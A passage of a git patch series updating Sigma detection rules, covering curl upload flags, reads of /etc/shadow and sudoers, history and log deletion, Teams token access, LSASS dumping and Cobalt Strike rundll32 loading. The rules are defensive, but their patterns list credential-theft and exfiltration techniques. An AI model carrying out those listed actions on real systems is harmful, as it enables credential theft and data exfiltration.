'/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 From 7a5017696fddafaa68eed8cc07b09e6e2fb90a69 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:23:15 +0200 Subject: [PATCH 34/96] Add more flag to curl windows rule --- .../proc_creation_win_susp_curl_fileupload.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 20ffcba7a..44c6f4373 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -9,7 +9,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html date: 2020/07/03 -modified: 2022/01/22 +modified: 2022/09/15 logsource: category: process_creation product: windows @@ -21,10 +21,12 @@ detection: CommandLine|contains: - ' -F ' - ' --form ' + - ' --form-string ' - ' -T ' - ' --upload-file ' - ' -d ' - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" condition: all of selection* fields: - CommandLine From 33271e9034c648f98f3dd1313c2fc9d0f07effdf Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:29:45 +0200 Subject: [PATCH 35/96] Quick update --- .../proc_creation_lnx_susp_history_delete.yml | 1 + .../proc_creation_macos_clear_system_logs.yml | 7 +++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 1e893bf23..49cd31ce6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -16,6 +16,7 @@ detection: Image|endswith: - '/rm' - '/unlink' + - '/shred' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml index 7c10bd097..3962cf127 100644 --- a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml +++ b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -12,7 +12,10 @@ logsource: category: process_creation detection: selection1: - Image|endswith: '/rm' + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: From 5dfa871cefa52c8e74b5b9acca99d9e117ce05c9 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:38:00 +0200 Subject: [PATCH 36/96] Update proc_creation_lnx_base64_shebang_cli.yml --- .../process_creation/proc_creation_lnx_base64_shebang_cli.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml index 73ac17665..a58e96eb9 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -12,7 +12,7 @@ logsource: category: process_creation detection: selection: - - CommandLine|contains: + CommandLine|contains: - "IyEvYmluL2Jhc2" #!/bin/bash" - "IyEvYmluL2Rhc2" #!/bin/dash" - "IyEvYmluL3pza" #!/bin/zsh" From c2256845b2e67837b4f71d2cc47a4efc256fca34 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:45:56 +0200 Subject: [PATCH 37/96] refactor: renamed and changed title --- ...ation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} (95%) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml similarity index 95% rename from rules/windows/process_creation/proc_creation_disable_SEP.yml rename to rules/windows/process_creation/proc_creation_win_taskkill_sep.yml index abe183491..92f6ddbbe 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,4 +1,4 @@ -title: Disabling Symantec Endpoint Protection with Taskkill +title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. From 7f3158d09e24d7b3edd9332e5ef81d253de0c7c2 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 11:47:19 +0200 Subject: [PATCH 38/96] Fix after review --- .../linux/process_creation/proc_creation_lnx_cat_sudoers.yml | 1 + .../linux/process_creation/proc_creation_lnx_curl_usage.yml | 2 +- .../process_creation/proc_creation_lnx_local_account.yml | 1 + .../process_creation/proc_creation_lnx_local_groups.yml | 1 + .../proc_creation_lnx_susp_curl_fileupload.yml | 5 ++--- .../proc_creation_lnx_susp_history_recon.yml | 1 + .../proc_creation_win_susp_curl_fileupload.yml | 3 +-- 7 files changed, 8 insertions(+), 6 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 5f7b9d5e7..2f7690be4 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -17,6 +17,7 @@ detection: - 'grep' - '/head' - '/tail' + - '/more' CommandLine|contains: ' /etc/sudoers' condition: selection falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml index 730ba33df..580eece01 100644 --- a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -11,7 +11,7 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' condition: selection falsepositives: - Scripts created by developers and admins diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index 058e10b0e..fee4138fe 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -20,6 +20,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: - '/etc/passwd' - '/etc/shadow' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index ba0b9cad7..1bf72b8ea 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -18,6 +18,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml index a38c1ef16..c47d62511 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -18,11 +18,10 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index ffddb3b60..128644fd6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -17,6 +17,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 44c6f4373..f8ae829c9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -20,8 +20,7 @@ detection: selection_cli: CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' From 9d5652c4c2d406440837fb6e0cd98cf76c4879ff Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:43:01 +0200 Subject: [PATCH 39/96] Update proc_creation_lnx_services_stop_and_disable.yml --- .../proc_creation_lnx_services_stop_and_disable.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml index 130d9b5c8..7b1778780 100644 --- a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -1,4 +1,4 @@ -title: Disable Or Stop Servicess +title: Disable Or Stop Services id: de25eeb8-3655-4643-ac3a-b662d3f26b6b status: experimental description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services From 914aa4ee3153185b400e72d0107ce2c5ffbd307c Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:58:52 +0200 Subject: [PATCH 40/96] chore: add more checks --- tests/check-baseline-local.sh | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 4c3929b90..3c849f52d 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -12,6 +12,24 @@ if [[ -z $(command -v wget) ]]; then exit 1 fi +if [[ -z $(command -v xargs) ]]; then + >2& echo "xargs not found. Please install findutils." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v tar) ]]; then + >2& echo "tar not found. Please install." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v mktemp) ]]; then + >2& echo "mktemp not found. Please install coreutils." + >2& echo "Exiting" + exit 1 +fi + if [[ -z $(command -v realpath) ]]; then >2& echo "realpath not found. Please install coreutils." >2& echo "Exiting" From 68a80844ea911f6ddd0ba0f77fc964f6713bdda9 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 15 Sep 2022 13:14:37 +0200 Subject: [PATCH 41/96] fix: new FPs in testing environment --- .../image_load/image_load_susp_dbghelp_dbgcore_load.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml index c3d02ecdd..36d307d82 100755 --- a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml @@ -8,7 +8,7 @@ references: - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 date: 2019/10/27 -modified: 2022/08/09 +modified: 2022/09/15 logsource: category: image_load product: windows @@ -35,7 +35,7 @@ detection: - '\cscript.exe' - '\mshta.exe' # - '\regsvr32.exe' triggered by installing common software - - '\schtasks.exe' + # - '\schtasks.exe' triggered by installing software - '\dnx.exe' - '\regsvcs.exe' - '\sc.exe' From bde13350059aefd5833f151b0eda82924b6e2190 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:53:42 +0200 Subject: [PATCH 42/96] fix: FP with .NET ngen on test system --- .../registry_set/registry_set_taskcache_entry.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml index eaa29e421..c44153a11 100644 --- a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml +++ b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml @@ -3,7 +3,7 @@ id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious status: experimental date: 2021/06/18 -modified: 2022/08/24 +modified: 2022/09/16 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ @@ -26,9 +26,11 @@ detection: filter_svchost: Image: 'C:\WINDOWS\system32\svchost.exe' filter_ngen: - Image|startswith: 'C:\Windows\Microsoft.NET\Framework\' + Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\ Image|endswith: '\ngen.exe' - TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + TargetObject|contains: + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN' filter_office_click_to_run: Image: - 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe' From bbc4aa329839f008cc63b1367b65203fa931824d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 10:08:08 +0200 Subject: [PATCH 43/96] improve detection rate --- ..._creation_win_cobaltstrike_load_by_rundll32.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml index fa318be5f..59d50cbdb 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml @@ -3,7 +3,7 @@ status: test id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 author: Wojciech Lesicki date: 2021/06/01 -modified: 2022/03/04 +modified: 2022/09/16 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable @@ -16,14 +16,18 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_rundll: + - Image|endswith: '\rundll32.exe' + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: - 'rundll32.exe' - - '.dll' + - 'rundll32 ' + selection_params: + CommandLine|contains: '.dll' CommandLine|endswith: - ' StartW' - ',StartW' - condition: selection + condition: all of selection* falsepositives: - Unknown level: high From 4ede1b413fa2f50d5a9509454d47054b43b26544 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:46:45 +0430 Subject: [PATCH 44/96] Update reference --- .../powershell_module/posh_pm_alternate_powershell_hosts.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 3fc16fea8..85ad15559 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -6,7 +6,7 @@ date: 2019/08/11 modified: 2022/04/21 author: Roberto Rodriguez @Cyb3rWard0g references: - - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html + - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html tags: - attack.execution - attack.t1059.001 @@ -30,4 +30,4 @@ falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher - Citrix ConfigSync.ps1 -level: medium \ No newline at end of file +level: medium From c78b332ba7bb0c7f50248f770edb4349081d696b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 19:37:26 +0200 Subject: [PATCH 45/96] Add posh_ps_sensitive_file_discovery --- .../posh_ps_sensitive_file_discovery.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml new file mode 100644 index 000000000..b4a5a05cd --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -0,0 +1,34 @@ +title: Powershell Sensitive File Discovery +id: 7d416556-6502-45b2-9bad-9d2f05f38997 +related: + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived +description: Detect adversaries enumerate sensitive files +references: + - https://twitter.com/malmoeb/status/1570814999370801158 +status: experimental +author: frack113 +date: 2022/09/16 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_action: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + selection_recurse: + ScriptBlockText|contains: '-recurse' + selection_file: + ScriptBlockText|contains: + - 'pass' + - 'kdbx' + condition: all of selection_* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.t1083 From 2cd376c70cae25e8213b4cfc702e2c7beedb6458 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:04:55 +0200 Subject: [PATCH 46/96] fix pass --- .../powershell_script/posh_ps_sensitive_file_discovery.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml index b4a5a05cd..5815a0ca6 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -23,8 +23,9 @@ detection: ScriptBlockText|contains: '-recurse' selection_file: ScriptBlockText|contains: - - 'pass' - - 'kdbx' + - '.pass' + - '.kdbx' + - '.kdb' condition: all of selection_* falsepositives: - Unknown From 8afb971e207a4dd85b06c0835a1cc8e9cf7089c6 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Sat, 17 Sep 2022 07:46:31 +0900 Subject: [PATCH 47/96] update application uninstalled rule --- .../builtin/application/win_builtin_remove_application.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 3209074b4..1a497e2b6 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -1,9 +1,10 @@ -title: An Application Is Uninstall +title: Application Uninstalled id: 570ae5ec-33dc-427c-b815-db86228ad43e status: experimental -description: An application have been remove check if it is a critical +description: An application has been removed. Check if it is critical. author: frack113 date: 2022/01/28 +modified: 2022/09/17 logsource: product: windows service: application @@ -16,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: low +level: informational tags: - attack.impact - attack.t1489 From 8b60317e2e42d23b579a612a7017e2fdda8ab1d0 Mon Sep 17 00:00:00 2001 From: tr0mb1r Date: Sat, 17 Sep 2022 10:47:35 +0400 Subject: [PATCH 48/96] Microsoft Teams Suspicious ObjectAccess events (#3500) --- .../win_teams_suspicious_objectaccess.yml | 27 +++++++++++++++++++ .../file_event_win_access_susp_teams.yml | 26 ++++++++++++++++++ ...ms_suspicious_command_line_cred_access.yml | 26 ++++++++++++++++++ 3 files changed, 79 insertions(+) create mode 100644 rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml create mode 100644 rules/windows/file_event/file_event_win_access_susp_teams.yml create mode 100644 rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml diff --git a/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml new file mode 100644 index 000000000..e19c134ff --- /dev/null +++ b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml @@ -0,0 +1,27 @@ +title: Suspicious Teams Application Related ObjectAcess Event +id: 25cde13e-8e20-4c29-b949-4e795b76f16f +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4663 + ObjectName|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + ProcessName|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/file_event/file_event_win_access_susp_teams.yml b/rules/windows/file_event/file_event_win_access_susp_teams.yml new file mode 100644 index 000000000..332a8a19c --- /dev/null +++ b/rules/windows/file_event/file_event_win_access_susp_teams.yml @@ -0,0 +1,26 @@ +title: Suspicious File Event With Teams Objects +id: 6902955a-01b7-432c-b32a-6f5f81d8f624 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml new file mode 100644 index 000000000..3c0eb326c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -0,0 +1,26 @@ +title: Suspicious Command With Teams Objects Pathes +id: d2eb17db-1d39-41dc-b57f-301f6512fa75 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 From 9f6604cf819a619dd615c2f4771d15aacf782d20 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:41:51 +0200 Subject: [PATCH 49/96] fix: aurora mtach calltrace msedeg.exe --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c449009b1..7faa0f832 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/08/09 +modified: 2022/09/18 logsource: category: process_access product: windows @@ -32,6 +32,8 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider + CallTrace|endswith: ')' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2da0554bedc5f3066064c1f61b318939edb33687 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 09:57:04 +0200 Subject: [PATCH 50/96] fix: temporarily disable Kernel-Audit-API-Calls --- .../proc_access_win_direct_syscall_ntopenprocess.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index 7faa0f832..e1587a4f6 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -33,7 +33,7 @@ detection: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider - CallTrace|endswith: ')' + Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* falsepositives: - Unknown From 2e8717d603ce7727240bbcec4d9f36285263052e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:39:56 +0200 Subject: [PATCH 51/96] fix: taskhostw FPs with lsass access --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 824d0f1ec..b462d8e29 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -70,6 +70,9 @@ detection: ProcessName|startswith: 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions filter3: ProcessName: 'C:\Windows\CCM\CcmExec.exe' + filter4: + ProcessName: 'C:\Windows\System32\taskhostw.exe' + AccessMask: '0x10' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName From 34957a784b16dd1ab3be976c3bcd0ff344c9d966 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 10:42:19 +0200 Subject: [PATCH 52/96] fix: modified date update --- rules/windows/builtin/security/win_susp_lsass_dump_generic.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index b462d8e29..0942e28b4 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/04/29 +modified: 2022/09/18 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment From 34d7ad03f7d7059a815ead1669694a62e2d38842 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 12:54:37 +0200 Subject: [PATCH 53/96] fix: FPs noticed with Aurora --- rules/windows/dns_query/dns_query_win_susp_ldap.yml | 4 +++- 